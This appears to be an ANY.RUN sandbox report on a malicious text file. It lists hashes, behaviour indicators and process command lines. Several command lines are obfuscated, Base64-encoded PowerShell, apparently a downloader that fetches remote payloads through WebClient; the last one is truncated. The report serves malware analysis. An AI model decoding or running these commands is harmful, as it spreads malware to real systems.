File name:

test.txt

Full analysis: https://app.any.run/tasks/303d8b3e-250d-4be1-bb4e-724fe6fd9a84
Verdict: Malicious activity
Analysis date: February 27, 2024, 16:50:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (4186), with no line terminators
MD5:

70EC42C70721DFA5577A11231FC66D8B

SHA1:

218F3D09B1CD3CA89DEBA42006F1B840C43EE5D0

SHA256:

5A64C36ABE98FAB7FC3D1BD5CE9DA771F4D9ED6CFE898905CF20ADF9534358A8

SSDEEP:

96:s3NVEjhK54KWgV5jBzXGqbCZ6jV0RNpmZZzZjedra4/:s3zMhK5XWSBDGqWZ6B0R7YZodO+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Reads the Internet Settings

      • notepad.exe (PID: 3672)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 2468)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 1772)
      • powershell.exe (PID: 3172)
      • powershell.exe (PID: 3508)

    • Starts CMD.EXE for commands execution

      • pwsh.exe (PID: 2208)

    • Starts POWERSHELL.EXE for commands execution

      • pwsh.exe (PID: 2208)
      • powershell.exe (PID: 2560)
      • cmd.exe (PID: 1236)

    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 1772)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 2468)
      • powershell.exe (PID: 3172)
      • powershell.exe (PID: 3508)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 2560)
      • pwsh.exe (PID: 2208)
      • cmd.exe (PID: 1236)

    • Application launched itself

      • powershell.exe (PID: 2560)

    • Reads the date of Windows installation

      • pwsh.exe (PID: 2208)

  • INFO

    • Manual execution by a user

      • pwsh.exe (PID: 2208)
      • explorer.exe (PID: 3652)

    • Reads the computer name

      • pwsh.exe (PID: 2208)

    • Checks supported languages

      • pwsh.exe (PID: 2208)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2560)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2560)

    • Create files in a temporary directory

      • powershell.exe (PID: 2560)

    • Reads the software policy settings

      • powershell.exe (PID: 2560)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
10
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start notepad.exe no specs explorer.exe no specs pwsh.exe powershell.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1236"C:\Windows\system32\cmd.exe"C:\Windows\System32\cmd.exepwsh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1772powershell -enc SkU5allYWndPRE05VzJOb1lYSmROREk3SkZVMk9XSnFOREE5S0NqaWdKaENidUtBbVN2aWdKaDZZbmJpZ0prcEsrS0FtRGhzNG9DWktUc21LT0tBbUc1bGQrS0FtU3ZpZ0pndGFlS0FtU3ZpZ0poMFpXM2lnSmtwSUNSbGJuWTZkVk5GY25CeVQwWnBUR1ZjUWpJd1JGbGhhMXh2ZGxCUlNHODBYQ0F0YVhSbGJYUjVjR1VnWkVseVJXTjBiM0o1TzF0T1pYUXVVMlZ5ZG1salpWQnZhVzUwVFdGdVlXZGxjbDA2T3VLQW5ITmxRM1ZTU1hSZ1dYQmdVazlVWUc5alQwemlnSjBnUFNBb0tPS0FtSFJzY3pFeTRvQ1pLK0tBbUN6aWdKa3BLeWNnNG9DWksrS0FtWFJzNG9DWksrS0FtSE14NG9DWkt5amlnSmd4TENCMGJPS0FtU3ZpZ0poejRvQ1pLU2s3SkVOMU5ubG9NWG9nUFNBbzRvQ1lWdUtBbVNzbzRvQ1lPVzltNG9DWksrS0FtSG5pZ0prcEsrS0FtSGh3NG9DWktUc2tTSEZrZDJ4cWFUMG80b0NZUjJMaWdKa3JLT0tBbURUaWdKa3I0b0NZZFRBeDRvQ1pLU3ZpZ0poejRvQ1pLVHNrU0hkNmNUaDRNVDBrWlc1Mk9uVnpaWEp3Y205bWFXeGxLeWdvSjNzd0p5dmlnSmg5UWpJdzRvQ1pLK0tBbUdSNTRvQ1pLK0tBbUdIaWdKa3I0b0NZYTNzd2ZVOTJjSEZvYnpSN01IM2lnSmdwSUNBdFJpQWdXMk5JWVZKZE9USXBLeVJEZFRaNWFERjZLeWdvNG9DWUxtWGlnSmtyNG9DWWVPS0FtU2tyNG9DWVplS0FtU2s3SkZWMFltdHNhVFk5S09LQW1FZmlnSmtyS09LQW1HRjM0b0NaSytLQW1HcGhlZUtBbVNrcjRvQ1liT0tBbVNrN0pFRmpiSHBpTnpZOUppamlnSmh1WmVLQW1TdmlnSmgzTFc5aTRvQ1pLK0tBbUdwbFkzVGlnSmtwSUc1bFZDNVhaV0pqVEdsRlRsUTdKRkYwT1dKM1pYRTlLQ2ppZ0pobzRvQ1pLK0tBbUhoNDRvQ1pLU3NvNG9DWWNEcmlnSmdyNG9DWkwrS0FtQ2tyS09LQW1DODhjdUtBbVN2aWdKaGw0b0NaS1NzbzRvQ1laT0tBbVN2aWdKaGhZK0tBbVNrcjRvQ1lkT0tBbVNzbzRvQ1laZUtBbWVLQW1HUStMbVBpZ0prcjRvQ1liMjB2ZDNBdFllS0FtU2tyS09LQW1HUnRhVzR2VTJKdzRvQ1pLK0tBbUMvaWdKa3I0b0NZS21qaWdKa3BLK0tBbUhoNDRvQ1pLK0tBbUhEaWdKa3JLT0tBbVRvdkwrS0FtU3ZpZ0prOGN1S0FtU2tyS09LQW1HWGlnSmtyNG9DWVpHSGlnSmtyNG9DWVkzUmxaRDR1WStLQW1Ta3I0b0NZYitLQW1TdmlnSmh0NG9DWkt5amlnSmd2ZCtLQW1TdmlnSmh3TGVLQW1Ta3I0b0NZYWVLQW1Tc280b0NZYm1QaWdKa3I0b0NZYkhWa1plS0FtU2tyS09LQW1ITXY0b0NaSytLQW1Wa3Y0b0NZSytLQW1TcG9lT0tBbVN2aWdKaDRjT0tBbVNrcktPS0FtRG92NG9DWUsrS0FtUzg4Y21WazRvQ1pLK0tBbUdGamRPS0FtU2tyNG9DWVpXUSs0b0NaSytLQW1DNWo0b0NaSytLQW1HL2lnSmtyNG9DWWJTL2lnSmtyS09LQW1IZHc0b0NaSytLQW1DM2lnSmtwSytLQW1HUGlnSmtyS09LQW1HL2lnSmtyNG9DWWJ1S0FtU3ZpZ0poMFpXNTA0b0NaS1N2aWdKZ3Y0b0NaSytLQW1IZmlnSmtyNG9DWVplS0FtU3ZpZ0poeTRvQ1pLeWppZ0prdkt1S0FtU3ZpZ0psbzRvQ1pLK0tBbUhoNGNPS0FtU3ZpZ0pnNkx5ODhjdUtBbVNrcktPS0FtR1ZrNG9DWksrS0FtR0ZqZE9LQW1TdmlnSmhsWkQ0dTRvQ1pLU3NvNG9DWVkyL2lnSmtyNG9DWWJlS0FtU2tyNG9DWUwzZmlnSmtyS09LQW1IRGlnSmtyNG9DWUxXSGlnSmtwS3lqaWdKaGtiZUtBbVN2aWdKaHA0b0NaS1N2aWdKaHVMK0tBbUNzbk0wVGlnSmtyS09LQW1DOHFhSGppZ0prcjRvQ1llT0tBbVNrcjRvQ1ljRHJpZ0pncjRvQ1pMK0tBbUN2aWdKa3ZQSExpZ0prcjRvQ1laV1RpZ0prcktPS0FtR0hpZ0prcjRvQ1pZM1JsWkQ0dTRvQ1pLK0tBbVdQaWdKa3BLK0tBbUc5dDRvQ1pLeWppZ0pndmQzRGlnSmtyNG9DWUxXTnZiblRpZ0prcEt5amlnSmhsNG9DWksrS0FtRzUwNG9DWktTdmlnSmd2TStLQW1Tc280b0NZWlM4cWFPS0FtU3ZpZ0poNDRvQ1pLU3ZpZ0poNDRvQ1pLeWppZ0pod09pL2lnSmdyNG9DWkx6eGg0b0NaS1NzbzRvQ1libTkwNG9DWksrS0FtR2ppZ0prcEt5amlnSmhsY3VLQW1TdmlnSmd1NG9DWktTdmlnSmh5WldUaWdKa280b0NZWWVLQW1TdmlnSmhqZEdWa0x1S0FtU3ZpZ0psa2IrS0FtU2tyS09LQW1HMWg0b0NaSytLQW1HbmlnSmtwSytLQW1HNCtMbVBpZ0prcjRvQ1liMjNpZ0prcjRvQ1lMM1BpZ0prcjRvQ1llZUtBbVNzbzRvQ1ljeTNpZ0prcjRvQ1pZMkZqNG9DWktTdmlnSmhvWmVLQW1TdmlnSmd2NG9DWksrS0FtRmppZ0prcjRvQ1lidUtBbVNzbzRvQ1lWT0tBbVN2aWdKZ3Y0b0NaSytLQW1TcG9lSGh3T3VLQW1Ta3I0b0NaTHkvaWdKa3I0b0NaUEhUaWdKa3I0b0NZYUdYaWdKa3JLT0tBbUdiaWdKa3I0b0NZYVc1aGJDNXk0b0NaS1NzbzRvQ1laV1RpZ0prcjRvQ1lZV1BpZ0prcEt5amlnSmgwYVcvaWdKa3I0b0NZYmo0dVkyL2lnSmtwS3lqaWdKaHRMMlRpZ0prcjRvQ1lZZUtBbVN2aWdKaDBZUy9pZ0prcEt5amlnSmgxNG9DWksrS0FtR3gwYVczaWdKa3BLeWppZ0poaGRHVnRaVzFpNG9DWksrS0FtR1hpZ0prcjRvQ1ljaTlNNG9DWktTdmlnSmd2NG9DWktTN2lnSnh6VUd4Z2FWVGlnSjBvSkU5allYWndPRE1wT3lSTU5UTTFlbTFsUFNnbzRvQ1lSSFBpZ0prcjRvQ1lNM1ZsNG9DWktTdmlnSmd6NG9DWksrS0FtSERpZ0prcE8yWnZjbVZoWTJnb0pFVXhNMnBsZDNNZ2FXNGdKRkYwT1dKM1pYRXBlM1J5ZVhza1FXTnNlbUkzTmk3aWdKeGtZRTlYYmt4dlFXUmdSbWxnVEdYaWdKMG9KRVV4TTJwbGQzTXNJQ1JJZDNweE9IZ3hLVHNrVEdWdFpuWm1ORDBvS09LQW1GQnhiZUtBbVN2aWdKaHI0b0NaS1N2aWdKaDQ0b0NaSytLQW1EQm40b0NaS1R0SlppQW9LQzRvNG9DWVIyWGlnSmtyNG9DWWRDMUpkR1hpZ0prcjRvQ1liZUtBbVNrZ0pFaDNlbkU0ZURFcEx1S0FuR3hsWUU1bllGUkk0b0NkSUMxblpTQXpNakEzTkNrZ2V5WW80b0NZU1c3aWdKa3I0b0NZZHVLQW1TdmlnSmh2YTJVdFNYUmw0b0NaSytLQW1HM2lnSmtwS0NSSWQzcHhPSGd4S1Rza1VHVmxNSHAyY1QwbzRvQ1lSK0tBbVNzbzRvQ1laalJ4YStLQW1TdmlnSmgwYytLQW1Ta3BPMkp5WldGck95Uk5OVGRzWjNkclBTamlnSmhUNG9DWkt5amlnSmhwYXVLQW1TdmlnSmhoTmVLQW1TdmlnSmhtWitLQW1Ta3BmWDFqWVhSamFIdDlmU1JGTm5ONGEyWXlQU2dvNG9DWldETnNZVi9pZ0pncjRvQ1pkK0tBbVNrcjRvQ1liT0tBbVNrPQ==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2208"C:\Program Files\PowerShell\7\pwsh.exe" -WorkingDirectory ~C:\Program Files\PowerShell\7\pwsh.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
pwsh
Exit code:
0
Version:
7.2.11.500
Modules
Images
c:\program files\powershell\7\pwsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
2468powershell -enc "SkU5allYWndPRE05VzJOb1lYSmROREk3SkZVMk9XSnFOREE5S0NqaWdKaENidUtBbVN2aWdKaDZZbmJpZ0prcEsrS0FtRGhzNG9DWktUc21LT0tBbUc1bGQrS0FtU3ZpZ0pndGFlS0FtU3ZpZ0poMFpXM2lnSmtwSUNSbGJuWTZkVk5GY25CeVQwWnBUR1ZjUWpJd1JGbGhhMXh2ZGxCUlNHODBYQ0F0YVhSbGJYUjVjR1VnWkVseVJXTjBiM0o1TzF0T1pYUXVVMlZ5ZG1salpWQnZhVzUwVFdGdVlXZGxjbDA2T3VLQW5ITmxRM1ZTU1hSZ1dYQmdVazlVWUc5alQwemlnSjBnUFNBb0tPS0FtSFJzY3pFeTRvQ1pLK0tBbUN6aWdKa3BLeWNnNG9DWksrS0FtWFJzNG9DWksrS0FtSE14NG9DWkt5amlnSmd4TENCMGJPS0FtU3ZpZ0poejRvQ1pLU2s3SkVOMU5ubG9NWG9nUFNBbzRvQ1lWdUtBbVNzbzRvQ1lPVzltNG9DWksrS0FtSG5pZ0prcEsrS0FtSGh3NG9DWktUc2tTSEZrZDJ4cWFUMG80b0NZUjJMaWdKa3JLT0tBbURUaWdKa3I0b0NZZFRBeDRvQ1pLU3ZpZ0poejRvQ1pLVHNrU0hkNmNUaDRNVDBrWlc1Mk9uVnpaWEp3Y205bWFXeGxLeWdvSjNzd0p5dmlnSmg5UWpJdzRvQ1pLK0tBbUdSNTRvQ1pLK0tBbUdIaWdKa3I0b0NZYTNzd2ZVOTJjSEZvYnpSN01IM2lnSmdwSUNBdFJpQWdXMk5JWVZKZE9USXBLeVJEZFRaNWFERjZLeWdvNG9DWUxtWGlnSmtyNG9DWWVPS0FtU2tyNG9DWVplS0FtU2s3SkZWMFltdHNhVFk5S09LQW1FZmlnSmtyS09LQW1HRjM0b0NaSytLQW1HcGhlZUtBbVNrcjRvQ1liT0tBbVNrN0pFRmpiSHBpTnpZOUppamlnSmh1WmVLQW1TdmlnSmgzTFc5aTRvQ1pLK0tBbUdwbFkzVGlnSmtwSUc1bFZDNVhaV0pqVEdsRlRsUTdKRkYwT1dKM1pYRTlLQ2ppZ0pobzRvQ1pLK0tBbUhoNDRvQ1pLU3NvNG9DWWNEcmlnSmdyNG9DWkwrS0FtQ2tyS09LQW1DODhjdUtBbVN2aWdKaGw0b0NaS1NzbzRvQ1laT0tBbVN2aWdKaGhZK0tBbVNrcjRvQ1lkT0tBbVNzbzRvQ1laZUtBbWVLQW1HUStMbVBpZ0prcjRvQ1liMjB2ZDNBdFllS0FtU2tyS09LQW1HUnRhVzR2VTJKdzRvQ1pLK0tBbUMvaWdKa3I0b0NZS21qaWdKa3BLK0tBbUhoNDRvQ1pLK0tBbUhEaWdKa3JLT0tBbVRvdkwrS0FtU3ZpZ0prOGN1S0FtU2tyS09LQW1HWGlnSmtyNG9DWVpHSGlnSmtyNG9DWVkzUmxaRDR1WStLQW1Ta3I0b0NZYitLQW1TdmlnSmh0NG9DWkt5amlnSmd2ZCtLQW1TdmlnSmh3TGVLQW1Ta3I0b0NZYWVLQW1Tc280b0NZYm1QaWdKa3I0b0NZYkhWa1plS0FtU2tyS09LQW1ITXY0b0NaSytLQW1Wa3Y0b0NZSytLQW1TcG9lT0tBbVN2aWdKaDRjT0tBbVNrcktPS0FtRG92NG9DWUsrS0FtUzg4Y21WazRvQ1pLK0tBbUdGamRPS0FtU2tyNG9DWVpXUSs0b0NaSytLQW1DNWo0b0NaSytLQW1HL2lnSmtyNG9DWWJTL2lnSmtyS09LQW1IZHc0b0NaSytLQW1DM2lnSmtwSytLQW1HUGlnSmtyS09LQW1HL2lnSmtyNG9DWWJ1S0FtU3ZpZ0poMFpXNTA0b0NaS1N2aWdKZ3Y0b0NaSytLQW1IZmlnSmtyNG9DWVplS0FtU3ZpZ0poeTRvQ1pLeWppZ0prdkt1S0FtU3ZpZ0psbzRvQ1pLK0tBbUhoNGNPS0FtU3ZpZ0pnNkx5ODhjdUtBbVNrcktPS0FtR1ZrNG9DWksrS0FtR0ZqZE9LQW1TdmlnSmhsWkQ0dTRvQ1pLU3NvNG9DWVkyL2lnSmtyNG9DWWJlS0FtU2tyNG9DWUwzZmlnSmtyS09LQW1IRGlnSmtyNG9DWUxXSGlnSmtwS3lqaWdKaGtiZUtBbVN2aWdKaHA0b0NaS1N2aWdKaHVMK0tBbUNzbk0wVGlnSmtyS09LQW1DOHFhSGppZ0prcjRvQ1llT0tBbVNrcjRvQ1ljRHJpZ0pncjRvQ1pMK0tBbUN2aWdKa3ZQSExpZ0prcjRvQ1laV1RpZ0prcktPS0FtR0hpZ0prcjRvQ1pZM1JsWkQ0dTRvQ1pLK0tBbVdQaWdKa3BLK0tBbUc5dDRvQ1pLeWppZ0pndmQzRGlnSmtyNG9DWUxXTnZiblRpZ0prcEt5amlnSmhsNG9DWksrS0FtRzUwNG9DWktTdmlnSmd2TStLQW1Tc280b0NZWlM4cWFPS0FtU3ZpZ0poNDRvQ1pLU3ZpZ0poNDRvQ1pLeWppZ0pod09pL2lnSmdyNG9DWkx6eGg0b0NaS1NzbzRvQ1libTkwNG9DWksrS0FtR2ppZ0prcEt5amlnSmhsY3VLQW1TdmlnSmd1NG9DWktTdmlnSmh5WldUaWdKa280b0NZWWVLQW1TdmlnSmhqZEdWa0x1S0FtU3ZpZ0psa2IrS0FtU2tyS09LQW1HMWg0b0NaSytLQW1HbmlnSmtwSytLQW1HNCtMbVBpZ0prcjRvQ1liMjNpZ0prcjRvQ1lMM1BpZ0prcjRvQ1llZUtBbVNzbzRvQ1ljeTNpZ0prcjRvQ1pZMkZqNG9DWktTdmlnSmhvWmVLQW1TdmlnSmd2NG9DWksrS0FtRmppZ0prcjRvQ1lidUtBbVNzbzRvQ1lWT0tBbVN2aWdKZ3Y0b0NaSytLQW1TcG9lSGh3T3VLQW1Ta3I0b0NaTHkvaWdKa3I0b0NaUEhUaWdKa3I0b0NZYUdYaWdKa3JLT0tBbUdiaWdKa3I0b0NZYVc1aGJDNXk0b0NaS1NzbzRvQ1laV1RpZ0prcjRvQ1lZV1BpZ0prcEt5amlnSmgwYVcvaWdKa3I0b0NZYmo0dVkyL2lnSmtwS3lqaWdKaHRMMlRpZ0prcjRvQ1lZZUtBbVN2aWdKaDBZUy9pZ0prcEt5amlnSmgxNG9DWksrS0FtR3gwYVczaWdKa3BLeWppZ0poaGRHVnRaVzFpNG9DWksrS0FtR1hpZ0prcjRvQ1ljaTlNNG9DWktTdmlnSmd2NG9DWktTN2lnSnh6VUd4Z2FWVGlnSjBvSkU5allYWndPRE1wT3lSTU5UTTFlbTFsUFNnbzRvQ1lSSFBpZ0prcjRvQ1lNM1ZsNG9DWktTdmlnSmd6NG9DWksrS0FtSERpZ0prcE8yWnZjbVZoWTJnb0pFVXhNMnBsZDNNZ2FXNGdKRkYwT1dKM1pYRXBlM1J5ZVhza1FXTnNlbUkzTmk3aWdKeGtZRTlYYmt4dlFXUmdSbWxnVEdYaWdKMG9KRVV4TTJwbGQzTXNJQ1JJZDNweE9IZ3hLVHNrVEdWdFpuWm1ORDBvS09LQW1GQnhiZUtBbVN2aWdKaHI0b0NaS1N2aWdKaDQ0b0NaSytLQW1EQm40b0NaS1R0SlppQW9LQzRvNG9DWVIyWGlnSmtyNG9DWWRDMUpkR1hpZ0prcjRvQ1liZUtBbVNrZ0pFaDNlbkU0ZURFcEx1S0FuR3hsWUU1bllGUkk0b0NkSUMxblpTQXpNakEzTkNrZ2V5WW80b0NZU1c3aWdKa3I0b0NZZHVLQW1TdmlnSmh2YTJVdFNYUmw0b0NaSytLQW1HM2lnSmtwS0NSSWQzcHhPSGd4S1Rza1VHVmxNSHAyY1QwbzRvQ1lSK0tBbVNzbzRvQ1laalJ4YStLQW1TdmlnSmgwYytLQW1Ta3BPMkp5WldGck95Uk5OVGRzWjNkclBTamlnSmhUNG9DWkt5amlnSmhwYXVLQW1TdmlnSmhoTmVLQW1TdmlnSmhtWitLQW1Ta3BmWDFqWVhSamFIdDlmU1JGTm5ONGEyWXlQU2dvNG9DWldETnNZVi9pZ0pncjRvQ1pkK0tBbVNrcjRvQ1liT0tBbVNrPQ=="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2560PowershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2900POwersheLL -ENCOD SkU5allYWndPRE05VzJOb1lYSmROREk3SkZVMk9XSnFOREE5S0NqaWdKaENidUtBbVN2aWdKaDZZbmJpZ0prcEsrS0FtRGhzNG9DWktUc21LT0tBbUc1bGQrS0FtU3ZpZ0pndGFlS0FtU3ZpZ0poMFpXM2lnSmtwSUNSbGJuWTZkVk5GY25CeVQwWnBUR1ZjUWpJd1JGbGhhMXh2ZGxCUlNHODBYQ0F0YVhSbGJYUjVjR1VnWkVseVJXTjBiM0o1TzF0T1pYUXVVMlZ5ZG1salpWQnZhVzUwVFdGdVlXZGxjbDA2T3VLQW5ITmxRM1ZTU1hSZ1dYQmdVazlVWUc5alQwemlnSjBnUFNBb0tPS0FtSFJzY3pFeTRvQ1pLK0tBbUN6aWdKa3BLeWNnNG9DWksrS0FtWFJzNG9DWksrS0FtSE14NG9DWkt5amlnSmd4TENCMGJPS0FtU3ZpZ0poejRvQ1pLU2s3SkVOMU5ubG9NWG9nUFNBbzRvQ1lWdUtBbVNzbzRvQ1lPVzltNG9DWksrS0FtSG5pZ0prcEsrS0FtSGh3NG9DWktUc2tTSEZrZDJ4cWFUMG80b0NZUjJMaWdKa3JLT0tBbURUaWdKa3I0b0NZZFRBeDRvQ1pLU3ZpZ0poejRvQ1pLVHNrU0hkNmNUaDRNVDBrWlc1Mk9uVnpaWEp3Y205bWFXeGxLeWdvSjNzd0p5dmlnSmg5UWpJdzRvQ1pLK0tBbUdSNTRvQ1pLK0tBbUdIaWdKa3I0b0NZYTNzd2ZVOTJjSEZvYnpSN01IM2lnSmdwSUNBdFJpQWdXMk5JWVZKZE9USXBLeVJEZFRaNWFERjZLeWdvNG9DWUxtWGlnSmtyNG9DWWVPS0FtU2tyNG9DWVplS0FtU2s3SkZWMFltdHNhVFk5S09LQW1FZmlnSmtyS09LQW1HRjM0b0NaSytLQW1HcGhlZUtBbVNrcjRvQ1liT0tBbVNrN0pFRmpiSHBpTnpZOUppamlnSmh1WmVLQW1TdmlnSmgzTFc5aTRvQ1pLK0tBbUdwbFkzVGlnSmtwSUc1bFZDNVhaV0pqVEdsRlRsUTdKRkYwT1dKM1pYRTlLQ2ppZ0pobzRvQ1pLK0tBbUhoNDRvQ1pLU3NvNG9DWWNEcmlnSmdyNG9DWkwrS0FtQ2tyS09LQW1DODhjdUtBbVN2aWdKaGw0b0NaS1NzbzRvQ1laT0tBbVN2aWdKaGhZK0tBbVNrcjRvQ1lkT0tBbVNzbzRvQ1laZUtBbWVLQW1HUStMbVBpZ0prcjRvQ1liMjB2ZDNBdFllS0FtU2tyS09LQW1HUnRhVzR2VTJKdzRvQ1pLK0tBbUMvaWdKa3I0b0NZS21qaWdKa3BLK0tBbUhoNDRvQ1pLK0tBbUhEaWdKa3JLT0tBbVRvdkwrS0FtU3ZpZ0prOGN1S0FtU2tyS09LQW1HWGlnSmtyNG9DWVpHSGlnSmtyNG9DWVkzUmxaRDR1WStLQW1Ta3I0b0NZYitLQW1TdmlnSmh0NG9DWkt5amlnSmd2ZCtLQW1TdmlnSmh3TGVLQW1Ta3I0b0NZYWVLQW1Tc280b0NZYm1QaWdKa3I0b0NZYkhWa1plS0FtU2tyS09LQW1ITXY0b0NaSytLQW1Wa3Y0b0NZSytLQW1TcG9lT0tBbVN2aWdKaDRjT0tBbVNrcktPS0FtRG92NG9DWUsrS0FtUzg4Y21WazRvQ1pLK0tBbUdGamRPS0FtU2tyNG9DWVpXUSs0b0NaSytLQW1DNWo0b0NaSytLQW1HL2lnSmtyNG9DWWJTL2lnSmtyS09LQW1IZHc0b0NaSytLQW1DM2lnSmtwSytLQW1HUGlnSmtyS09LQW1HL2lnSmtyNG9DWWJ1S0FtU3ZpZ0poMFpXNTA0b0NaS1N2aWdKZ3Y0b0NaSytLQW1IZmlnSmtyNG9DWVplS0FtU3ZpZ0poeTRvQ1pLeWppZ0prdkt1S0FtU3ZpZ0psbzRvQ1pLK0tBbUhoNGNPS0FtU3ZpZ0pnNkx5ODhjdUtBbVNrcktPS0FtR1ZrNG9DWksrS0FtR0ZqZE9LQW1TdmlnSmhsWkQ0dTRvQ1pLU3NvNG9DWVkyL2lnSmtyNG9DWWJlS0FtU2tyNG9DWUwzZmlnSmtyS09LQW1IRGlnSmtyNG9DWUxXSGlnSmtwS3lqaWdKaGtiZUtBbVN2aWdKaHA0b0NaS1N2aWdKaHVMK0tBbUNzbk0wVGlnSmtyS09LQW1DOHFhSGppZ0prcjRvQ1llT0tBbVNrcjRvQ1ljRHJpZ0pncjRvQ1pMK0tBbUN2aWdKa3ZQSExpZ0prcjRvQ1laV1RpZ0prcktPS0FtR0hpZ0prcjRvQ1pZM1JsWkQ0dTRvQ1pLK0tBbVdQaWdKa3BLK0tBbUc5dDRvQ1pLeWppZ0pndmQzRGlnSmtyNG9DWUxXTnZiblRpZ0prcEt5amlnSmhsNG9DWksrS0FtRzUwNG9DWktTdmlnSmd2TStLQW1Tc280b0NZWlM4cWFPS0FtU3ZpZ0poNDRvQ1pLU3ZpZ0poNDRvQ1pLeWppZ0pod09pL2lnSmdyNG9DWkx6eGg0b0NaS1NzbzRvQ1libTkwNG9DWksrS0FtR2ppZ0prcEt5amlnSmhsY3VLQW1TdmlnSmd1NG9DWktTdmlnSmh5WldUaWdKa280b0NZWWVLQW1TdmlnSmhqZEdWa0x1S0FtU3ZpZ0psa2IrS0FtU2tyS09LQW1HMWg0b0NaSytLQW1HbmlnSmtwSytLQW1HNCtMbVBpZ0prcjRvQ1liMjNpZ0prcjRvQ1lMM1BpZ0prcjRvQ1llZUtBbVNzbzRvQ1ljeTNpZ0prcjRvQ1pZMkZqNG9DWktTdmlnSmhvWmVLQW1TdmlnSmd2NG9DWksrS0FtRmppZ0prcjRvQ1lidUtBbVNzbzRvQ1lWT0tBbVN2aWdKZ3Y0b0NaSytLQW1TcG9lSGh3T3VLQW1Ta3I0b0NaTHkvaWdKa3I0b0NaUEhUaWdKa3I0b0NZYUdYaWdKa3JLT0tBbUdiaWdKa3I0b0NZYVc1aGJDNXk0b0NaS1NzbzRvQ1laV1RpZ0prcjRvQ1lZV1BpZ0prcEt5amlnSmgwYVcvaWdKa3I0b0NZYmo0dVkyL2lnSmtwS3lqaWdKaHRMMlRpZ0prcjRvQ1lZZUtBbVN2aWdKaDBZUy9pZ0prcEt5amlnSmgxNG9DWksrS0FtR3gwYVczaWdKa3BLeWppZ0poaGRHVnRaVzFpNG9DWksrS0FtR1hpZ0prcjRvQ1ljaTlNNG9DWktTdmlnSmd2NG9DWktTN2lnSnh6VUd4Z2FWVGlnSjBvSkU5allYWndPRE1wT3lSTU5UTTFlbTFsUFNnbzRvQ1lSSFBpZ0prcjRvQ1lNM1ZsNG9DWktTdmlnSmd6NG9DWksrS0FtSERpZ0prcE8yWnZjbVZoWTJnb0pFVXhNMnBsZDNNZ2FXNGdKRkYwT1dKM1pYRXBl